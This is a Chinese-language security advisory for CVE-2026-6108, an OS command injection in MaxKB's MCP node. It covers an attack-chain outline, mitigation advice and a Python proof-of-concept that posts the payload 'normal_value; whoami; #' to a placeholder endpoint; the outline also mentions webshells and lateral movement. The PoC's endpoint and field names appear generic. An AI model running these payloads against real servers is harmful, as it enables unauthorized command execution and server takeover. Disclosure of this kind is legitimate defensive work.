CVE-2026-6108 MaxKB操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-6108

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MaxKB

漏洞概述

CVE-2026-6108 是 1Panel-dev MaxKB 版本至 2.6.1 及之前版本中存在的一个安全漏洞。该漏洞位于 Model Context Protocol (MCP) 节点组件的 `base_mcp_node.py` 文件的 `execute` 函数中。由于未能正确处理用户输入，攻击者可以通过构造恶意数据执行操作系统命令注入攻击。此漏洞允许具有低权限的攻击者在无需用户交互的情况下进行远程攻击，从而可能导致系统机密性、完整性和可用性受损。目前该漏洞利用代码已公开，厂商已发布修复版本，建议用户尽快升级。

技术细节

该漏洞的根源在于 MaxKB 项目中 Model Context Protocol (MCP) 节点组件的代码实现存在缺陷。具体受影响的文件是 `apps/application/flow/step_node/mcp_node/impl/base_mcp_node.py` 中的 `execute` 函数。在该函数处理流程节点数据时，未能对来自用户输入的参数进行严格的清洗和安全校验，直接将数据拼接到系统命令中并调用底层接口执行。这种不安全的调用方式导致了经典的操作系统命令注入漏洞。攻击者利用 CVSS 向量中提到的低权限（PR:L）即可发起攻击，且无需用户交互（UI:N）。通过发送特制的 HTTP 请求至 MCP 节点接口，攻击者可以注入恶意的 Shell 命令。由于攻击复杂度低（AC:L）且利用代码已公开，攻击者可以轻易地在服务器端执行任意命令，获取系统敏感信息，甚至完全控制服务器，对机密性、完整性和可用性造成严重影响。

攻击链分析

STEP 1

信息收集

攻击者探测目标 MaxKB 服务的版本信息，确认其是否为 2.6.1 或更早版本。

STEP 2

获取访问权限

攻击者利用低权限账户（CVSS PR:L）登录 MaxKB 系统，获取合法的会话 Cookie。

STEP 3

构造恶意请求

攻击者针对 Model Context Protocol 节点的 `execute` 接口，在输入参数中插入命令注入 Payload（如 `; id; #`）。

STEP 4

执行命令

服务器端解析请求时，通过 `base_mcp_node.py` 中的漏洞函数执行了注入的操作系统命令。

STEP 5

建立控制

攻击者根据命令回显获取服务器权限，可能进一步上传 Webshell 或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL for the vulnerable endpoint
# The actual endpoint path may vary based on MaxKB deployment
target_url = "http://target-ip:port/api/application/mcp_node/execute"

# Attacker's session cookie (Low privilege required)
cookies = {
    "session": "low_privilege_session_cookie"
}

# Payload demonstrating OS command injection (e.g., executing 'whoami')
payload = {
    "node_id": "vulnerable_node_id",
    "inputs": {
        # Injecting command separator to execute arbitrary OS command
        "command_argument": "normal_value; whoami; #"
    }
}

try:
    print("[*] Sending exploit payload to MaxKB...")
    response = requests.post(
        target_url,
        headers={"Content-Type": "application/json"},
        cookies=cookies,
        data=json.dumps(payload),
        timeout=10
    )

    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        
        # Check if command execution artifacts are present in response
        if "uid=" in response.text or "www-data" in response.text:
            print("[!] Potential command injection detected in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {str(e)}")

影响范围

MaxKB <= 2.6.1

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用 Model Context Protocol (MCP) 节点相关功能。同时，应严格限制系统的出站网络连接，以防止被攻击者用作跳板。加强对系统异常进程和 Shell 访问的监控。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6108
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6108
3 Details https://www.cvedetails.com/cve/CVE-2026-6108/
4 VulDB https://vuldb.com/cve/CVE-2026-6108
5 Link https://github.com/AnalogyC0de/public_exp/issues/30
6 Link https://vuldb.com/submit/782279
7 Link https://vuldb.com/vuln/356968
8 Link https://vuldb.com/vuln/356968/cti